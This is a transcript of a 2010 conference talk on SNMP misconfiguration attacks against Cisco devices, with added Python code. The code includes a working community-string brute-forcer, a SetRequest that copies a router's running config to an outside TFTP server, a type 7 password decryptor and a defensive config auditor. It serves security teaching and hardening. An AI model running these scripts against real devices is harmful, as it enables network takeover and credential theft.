ZaCon 2010: Georg-Christian Pranschke
TRANSCRIPT
Agenda
- How it all began…
- SNMP?
- SNMP from a security perspective
- SNMP on Cisco appliances
- Exploiting SNMP misconfigurations
- Frisk-0
- Secure your SNMP-enabled devices
- Questions
SNMP?
Simple Network Management Protocol: monitor and manage devices on the network, such as
- Routers
- Switches
- Bridges
- Hubs
- IP phones and cameras
- Printers
- Computers
SNMP?
- Transport: UDP, port 161 (agent, answers queries) and 162 (manager, receives traps)
- Roles: the manager (network management station) polls, the agent running on the device answers
- Concepts: MIB (Management Information Base: the tree of objects an agent exposes), OID (Object Identifier: the dotted path naming one object, e.g. 1.3.6.1.2.1.1.1.0 for sysDescr), PDU (Protocol Data Unit: Get, GetNext, Set, Response, Trap)
- Versions: 1 and 2c authenticate with a community string sent in the clear; 3 adds user-based authentication and encryption
SNMP from a Security Perspective
- Plain-text protocol: in v1/v2c nothing on the wire is encrypted, including the community string
- UDP, so packets can be spoofed: there is no handshake, the source address is whatever the sender puts in it
- Every Get/Set request and response carries the community string; one sniffed packet is enough to learn it
- Community strings: defaults (public, private, admin, snmp, snmpd, …); weak communities, sometimes only 3 characters!; the same community or naming scheme reused across many devices
- User awareness
SNMP from a Security Perspective
- Information disclosure (read access): internal IP addresses, routing information, running processes, running services, installed software, usernames, hardware
- Compromise (write access): a read/write community hands over the device configuration itself
Brute Forcing Cisco Appliances
- TELNET: often only a password is required; only three tries, then reconnect; the enable password needs to be brute-forced as well
- SSH: needs username and password (ssh -1 for protocol version 1); only three tries per connection; the enable password needs to be brute-forced as well
- HTTP(S): basic authentication; fastest so far; no enable password
Brute Forcing Cisco Appliances
- SNMP: almost as fast as we can send UDP packets, since there is no connection, no handshake and no lockout; just the community string is needed; a read/write community means privileged access to the device!
SNMP on Cisco Appliances
- Remote configuration through SNMP by setting OIDs with a read/write community
- Configuration up- and downloads via TFTP: a Set tells the device to copy its configuration to a TFTP server, or to fetch a configuration from one
- Running config vs startup config: both can be copied in either direction
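The following is an added example, not code from the talk or from Frisk-0. It is a minimal SNMPv1 packet builder and parser that makes three slide points concrete: the community string is a plain OCTET STRING inside every message (the "plain-text protocol" slide), a community guess is one UDP datagram with no handshake so guessing runs at wire speed (the "almost as fast as we can send UDP packets" slide), and a single SetRequest against the ccCopyTable is enough to make an IOS device push its running config to a TFTP server (this slide). The ccCopyTable column numbers and enumerations are those of Cisco's CISCO-CONFIG-COPY-MIB; the talk does not name the MIB, so that choice, the row index 99, the probe wordlist and the sample addresses are assumptions of this example. Only probe_udp() touches the network; everything else is pure byte manipulation and runs offline.

```python
import socket

GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3   # SNMPv1 PDU tags
SYS_DESCR = "1.3.6.1.2.1.1.1.0"                          # harmless probe object
CC_COPY_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1.1"             # CISCO-CONFIG-COPY-MIB ccCopyEntry


def _ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def enc_int(v):
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def enc_str(s):
    return _tlv(0x04, s.encode() if isinstance(s, str) else s)


def enc_null():
    return b"\x05\x00"


def enc_ipaddr(ip):
    return _tlv(0x40, socket.inet_aton(ip))   # SNMP IpAddress = APPLICATION 0, 4 octets


def enc_oid(oid):
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:                        # base-128, high bit set on all but the last byte
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def snmp_message(community, pdu_type, varbinds, request_id=1):
    """Message ::= SEQUENCE { version INTEGER (0 = v1), community OCTET STRING, PDU }.
    The community is an ordinary OCTET STRING: anyone on the path reads it."""
    vbl = _tlv(0x30, b"".join(_tlv(0x30, enc_oid(o) + v) for o, v in varbinds))
    pdu = _tlv(pdu_type, enc_int(request_id) + enc_int(0) + enc_int(0) + vbl)
    return _tlv(0x30, enc_int(0) + enc_str(community) + pdu)


def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_message(packet):
    """Return (version, community, pdu_type, request_id, error_status)."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, p = _read_tlv(msg, 0)
    _, community, p = _read_tlv(msg, p)
    pdu_type, pdu, _ = _read_tlv(msg, p)
    _, rid, q = _read_tlv(pdu, 0)
    _, err, _ = _read_tlv(pdu, q)
    return (int.from_bytes(version, "big"), community.decode("latin-1"), pdu_type,
            int.from_bytes(rid, "big"), int.from_bytes(err, "big", signed=True))


def community_probes(wordlist):
    """One GetRequest per guess; the request-id says which guess a reply belongs to."""
    return {i: (c, snmp_message(c, GET_REQUEST, [(SYS_DESCR, enc_null())], i))
            for i, c in enumerate(wordlist, start=1)}


def match_reply(reply, probes):
    """A v1 agent stays silent on a wrong community, so any matching GetResponse is a hit."""
    _, _, pdu_type, rid, err = parse_message(reply)
    if pdu_type == GET_RESPONSE and err == 0 and rid in probes:
        return probes[rid][0]
    return None


def cc_copy_running_to_tftp(community, tftp_server, filename, row=99, request_id=1):
    """SetRequest that creates a ccCopyTable row: running-config -> TFTP server."""
    e = CC_COPY_ENTRY
    return snmp_message(community, SET_REQUEST, [
        (f"{e}.2.{row}", enc_int(1)),               # ccCopyProtocol = tftp(1)
        (f"{e}.3.{row}", enc_int(4)),               # ccCopySourceFileType = runningConfig(4)
        (f"{e}.4.{row}", enc_int(1)),               # ccCopyDestFileType = networkFile(1)
        (f"{e}.5.{row}", enc_ipaddr(tftp_server)),  # ccCopyServerAddress
        (f"{e}.6.{row}", enc_str(filename)),        # ccCopyFileName
        (f"{e}.14.{row}", enc_int(4)),              # ccCopyEntryRowStatus = createAndGo(4)
    ], request_id)


def probe_udp(host, wordlist, timeout=2.0, port=161):
    """Send every guess back to back (no handshake), then collect replies until silence."""
    probes = community_probes(wordlist)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    for _, packet in probes.values():
        sock.sendto(packet, (host, port))
    hits = set()
    while True:
        try:
            reply = sock.recvfrom(4096)[0]
        except socket.timeout:
            return hits
        try:
            hit = match_reply(reply, probes)
        except (ValueError, IndexError):
            continue                                # not SNMP, ignore it
        if hit:
            hits.add(hit)
```

Typical use against a lab device you own: `probe_udp("192.0.2.1", ["public", "private", "cisco"])` returns the communities that answered; `cc_copy_running_to_tftp("private", "192.0.2.10", "r1.cfg")` is the datagram a RW community lets you send. Note that the v1 agent's silence on a wrong community is exactly what makes guessing cheap: there is nothing to back off from.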
Frisk-0
"Rogue Management Interface"
- Brute-forces community strings
- Downloads running and startup configurations
- Extracts and decrypts all passwords and hashes
- Batch mode: from a targets file or from network ranges
- Spoofing capabilities
- "Configlets" (enable TELNET / reset passwords)
- Fully automated and unattended
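An added example (not Frisk-0's code) of the "extracts and decrypts all passwords and hashes" step: given a downloaded IOS configuration, pull out the enable password, user passwords, line passwords and SNMP communities, and reverse the type 7 obfuscation that `service password-encryption` applies. Type 7 is a fixed XOR against a public key table, so it is reversible; type 5 (`enable secret`) is md5crypt and is only reported for offline cracking. The regular expressions cover the common IOS forms only, and the sample configuration below is constructed for this example (the type 7 strings in it are the widely published test vectors for "cisco"; the type 5 hash is a dummy, not a real one).

```python
import re

# Fixed XOR key used by IOS "service password-encryption" (type 7). It is a
# public constant, which is why type 7 is reversible, unlike type 5 (md5crypt).
_XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decrypt_type7(enc):
    """'0822455D0A16' -> 'cisco'. First two decimal digits = key offset, rest = hex bytes."""
    enc = enc.strip()
    if len(enc) < 4 or len(enc) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", enc):
        raise ValueError(f"not a type 7 string: {enc!r}")
    seed = int(enc[:2], 10)
    data = bytes.fromhex(enc[2:])
    return bytes(b ^ _XLAT[(seed + i) % len(_XLAT)] for i, b in enumerate(data)).decode("latin-1")


def encrypt_type7(plain, seed=8):
    """Inverse of decrypt_type7; handy for producing test vectors."""
    data = bytes(ord(c) ^ _XLAT[(seed + i) % len(_XLAT)] for i, c in enumerate(plain))
    return f"{seed:02d}" + data.hex().upper()


# Each pattern yields 'val' and, where IOS stores one, the encryption 'type' digit.
_PATTERNS = [
    ("enable secret", re.compile(r"^enable secret (?P<type>\d) (?P<val>\S+)")),
    ("enable password", re.compile(r"^enable password (?:(?P<type>\d) )?(?P<val>\S+)")),
    ("username", re.compile(
        r"^username (?P<user>\S+) .*?(?:password|secret) (?:(?P<type>\d) )?(?P<val>\S+)")),
    ("line password", re.compile(r"^\s+password (?:(?P<type>\d) )?(?P<val>\S+)")),
    ("snmp community", re.compile(r"^snmp-server community (?P<val>\S+)")),
]


def extract_secrets(config_text):
    """Walk a running/startup config and recover whatever can be recovered."""
    found = []
    for line in config_text.splitlines():
        for kind, rx in _PATTERNS:
            m = rx.match(line)
            if not m:
                continue
            g = m.groupdict()
            enc_type, value = g.get("type"), g["val"]
            if enc_type == "7":
                plain = decrypt_type7(value)
            elif enc_type in (None, "0"):
                plain = value                       # stored in the clear
            else:
                plain = None                        # type 5 etc.: a hash, crack offline
            found.append({"kind": kind, "user": g.get("user"), "type": enc_type or "0",
                          "value": value, "plain": plain})
            break
    return found


# Constructed sample config for this example; the $1$ hash is a placeholder, not real.
SAMPLE_CONFIG = """\
!
hostname r1
enable secret 5 $1$abcd$0123456789ABCDEFGHIJKL
enable password 7 0822455D0A16
username admin privilege 15 password 7 094F471A1A0A
snmp-server community public RO
snmp-server community private RW
line vty 0 4
 password 7 0822455D0A16
 login
"""

if __name__ == "__main__":
    for s in extract_secrets(SAMPLE_CONFIG):
        print(f"{s['kind']:16} {s['user'] or '-':8} type {s['type']}: {s['plain'] or s['value']}")
```

Every type 7 entry in a downloaded config decodes instantly, and with `service password-encryption` off the passwords sit there in clear text anyway; only `enable secret` (type 5) needs real cracking effort, which is why the slide says "passwords and hashes".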
Secure Your SNMP Enabled Devices
- Do you really need SNMP? Do you really need a RW community?
- Set strong community strings: 40+ characters? Why not!
- Access-lists for SNMP and for TFTP! Both are UDP, so the source address can be spoofed: an access-list is a hurdle, not a guarantee
- Prefer SNMPv3 (authentication and encryption) where the device supports it
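An added example (not from the talk) that turns the hardening slide into a check you can run over an exported IOS configuration: it flags default or short community strings, RW communities, communities not bound to an access-list or bound to one that is never defined, SNMP-triggered TFTP copies not restricted with `snmp-server tftp-server-list`, and the absence of any SNMPv3 group. The default-name list extends the slide's examples with a few equally common strings, the 20-character threshold (the slide suggests 40+) and the two sample configurations are assumptions of this example, and the regular expressions cover the usual IOS `snmp-server community NAME [view V] [RO|RW] [ACL]` form only.

```python
import re

# Well-known community strings: the slide's list plus a few equally common ones.
DEFAULT_COMMUNITIES = {"public", "private", "admin", "snmp", "snmpd",
                       "cisco", "secret", "write", "manager"}

# snmp-server community NAME [view VIEW] [RO|RW] [ACL]   (IOS prints the keyword in upper case)
COMMUNITY_RX = re.compile(
    r"^snmp-server community (?P<name>\S+)(?: view (?P<view>\S+))?"
    r"(?: (?P<mode>[Rr][OoWw]))?(?: (?P<acl>\S+))?\s*$")
ACL_RX = re.compile(r"^(?:ip )?access-list (?:standard |extended )?(?P<acl>\S+)")
V3_RX = re.compile(r"^snmp-server group \S+ v3 (?:auth|priv)")


def audit_snmp(config_text, min_len=20):
    """Return [(severity, message)] for the SNMP part of an IOS configuration."""
    lines = [l.rstrip() for l in config_text.splitlines()]
    acls = {m["acl"] for m in map(ACL_RX.match, lines) if m}
    has_v3 = any(map(V3_RX.match, lines))
    has_tftp_list = any(l.startswith("snmp-server tftp-server-list ") for l in lines)
    findings, communities, rw_seen = [], 0, False
    for l in lines:
        m = COMMUNITY_RX.match(l)
        if not m:
            continue
        communities += 1
        name, mode, acl = m["name"], (m["mode"] or "RO").upper(), m["acl"]
        if name.lower() in DEFAULT_COMMUNITIES:
            findings.append(("high", f"community '{name}' is a well-known default"))
        if len(name) < min_len:
            findings.append(("medium", f"community '{name}' is only {len(name)} characters"))
        if mode == "RW":
            rw_seen = True
            findings.append(("high", f"RW community '{name}': do you really need write access?"))
        if acl is None:
            findings.append(("critical" if mode == "RW" else "medium",
                             f"community '{name}' ({mode}) is not bound to an access-list"))
        elif acl not in acls:
            findings.append(("high", f"community '{name}' references access-list {acl}, "
                                     "which is not defined"))
    if rw_seen and not has_tftp_list:
        findings.append(("high", "no 'snmp-server tftp-server-list': SNMP-triggered config "
                                 "copies can target any TFTP server"))
    if communities and not has_v3:
        findings.append(("info", "only v1/v2c communities configured; prefer SNMPv3 with auth and priv"))
    return findings


# Constructed sample configurations for this example (not from the talk).
WEAK_CONFIG = """\
snmp-server community public RO
snmp-server community private RW
snmp-server community s3cr3t RW 10
"""

HARDENED_CONFIG = """\
access-list 10 permit host 192.0.2.10
access-list 10 deny any log
snmp-server community R7vQ2kLmX9pZ4wHb8nYc3fTj6sDg1aUe5oIr0qWv RO 10
snmp-server tftp-server-list 10
snmp-server group NMS v3 priv
snmp-server user nms NMS v3 auth sha AuthPassPhrase priv aes 128 PrivPassPhrase
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label}: {len(audit_snmp(cfg))} finding(s)")
        for severity, msg in audit_snmp(cfg):
            print(f"  [{severity}] {msg}")
```

The hardened sample keeps the slide's advice in one place: no RW community, a 40-character string, an access-list that permits only the management station, TFTP copies restricted to the same list, and v3 configured for anything that needs more than read-only polling. Remember that the access-list still only filters on a spoofable UDP source address, which is why the RW community and the TFTP restriction matter more than the list itself.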